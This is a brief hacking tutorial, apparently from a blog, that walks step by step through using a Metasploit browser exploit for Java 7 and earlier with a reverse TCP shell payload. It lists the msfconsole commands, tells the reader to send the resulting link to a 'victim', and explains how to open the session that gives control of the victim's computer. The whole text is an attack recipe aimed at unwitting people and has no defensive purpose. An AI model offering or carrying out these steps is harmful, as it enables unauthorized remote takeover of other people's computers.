How to use latest java vulnerability to hack remote p.c. ?

Today we are going to use metasploit again. We can hack remote computer using java applet to run code outside send-box. This vulnerability is new. It` s applicable to java version 7 and earlier.

(1)To use this vulnerability first update your metasploit modules by runnig command msfupdate in your terminal

(2)Now after update type msfconsole

(3)type use exploit/multi/browser/java_jre17_jaxws

(4)set payload java/shell_reverse_tcp

(5)set lhost I.p)

(6)set srvhost I.p.)

(7)set uripath /


Now an URL you should give to your victim

Now send link to victim. When victim open your link, you have access of victim` s computer.

(9)type sessions -l

(10)the Session number to connect to the session. And Now Type sessions -i ID

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